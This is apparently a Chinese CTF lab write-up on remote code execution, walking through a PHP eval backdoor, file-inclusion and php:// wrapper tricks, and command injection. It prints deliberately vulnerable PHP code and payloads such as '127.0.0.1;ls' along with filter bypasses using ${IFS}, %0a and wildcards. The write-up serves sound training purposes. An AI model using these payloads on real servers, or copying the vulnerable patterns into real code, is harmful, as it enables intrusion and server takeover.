rce:远程代码执行漏洞
分为远程命令执行 ping 和远程代码执行 evel。
其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是 RCE 漏洞。相当于直接操控服务器电脑的 cmd 命令行!高危漏洞!

eval 执行

1
2
3
4
5
6
7
8
<?php
    if(isset($_REQUEST['cmd'])){
        eval($_REQUEST['cmd']);
    }
	else{
        highlight_file(__FILE__);
    }
?>

传参给 cmd 来 eval

1
/?cmd=system("ls /");//此处因为根目录无flag 所以看上一级目录

找到后 再 cat /flag_****

文件包含

这里使用 strpos 函数

strpos:查找字符串首次出现的位置

int strpos ( string $haystack , mixed $needle [, int $offset = 0 ] )

题目使用

1
2
3
if(!strpos($_GET["file"],"flag")){//无flag字符即可运行
    include $_GET["file"];
}

来包含文件,而下方给出的 shell.txt 含有 eval 漏洞

于是包含它(shell.txt 没有“flag”字符 所以这里 strpos 没影响)

image-20220218182857507

通过 get(包含文件) post(传参)并用来得到 flag

php info

1
2
3
4
5
6
7
8
9
10
11
<?php
if (isset($_GET['file'])){
	if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
         }
    else {
        echo "Hacker!!!";
    	}}
else {
    highlight_file(__FILE__);}?>
<hr>i don't have shell, how to get flag? <br><a href="phpinfo.php">phpinfo</a>

点击 phpinfo 链接 可查看 php 环境

php://input

1
2
3
4
5
/*php:// — 访问各个输入/输出流(I/O streams)

PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,   内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://input是个可以访问请求的原始数据的只读流。

image-20220218162728184

读取源代码

看环境 无法使用 php://input

1
2
3
4
5
6
7
8
9
10
11
12
<?php
error_reporting(E_ALL);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>

但还必须是 php://开头

php://filter

image-20220219174206504

image-20220219112308277

远程包含

同 phpinfo 做法相同

命令注入

输入命令

1
127.0.0.1;ls

然后 cat 时出现了问题

输出被限制了

于是用管道符号来限制输出 base64

得到后再解码

image-20220218170811553

过滤 cat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/cat/", $ip, $m)) {//过滤了cat
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    }
    else {
        $res = $m;
    }
}
?>

<pre>
<?php
    if ($res) {
        print_r($res);
    }
?>
</pre>
<?php
	show_source(__FILE__);
?>
</body>
</html>

more

Linux more 命令类似 cat ,不过会以一页一页的形式显示,更方便使用者逐页阅读,而最基本的指令就是按空白键(space)就往下一页显示,按 b 键就会往回(back)一页显示,而且还有搜寻字串的功能(与 vi 相似),使用中的说明文件,请按 h 。

1
more [-dlfpcsu] [-num] [+/pattern] [+linenum] [fileNames..]

image-20220218171602745

过滤空格

在 linux 里空格可用< 或 ${IFS}代替

image-20220218171910282

过滤运算符

cat [file]|base64 还可以用 base64 [file]

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||\&)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

image-20220219104650896

综合练习

1
!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip

;可以用%0a(url 编码) cat 用 base64 flag 用正则 f*** *lag 等 空格用 ${IFS}

image-20220219105932534

image-20220219110644693image-20220219110736333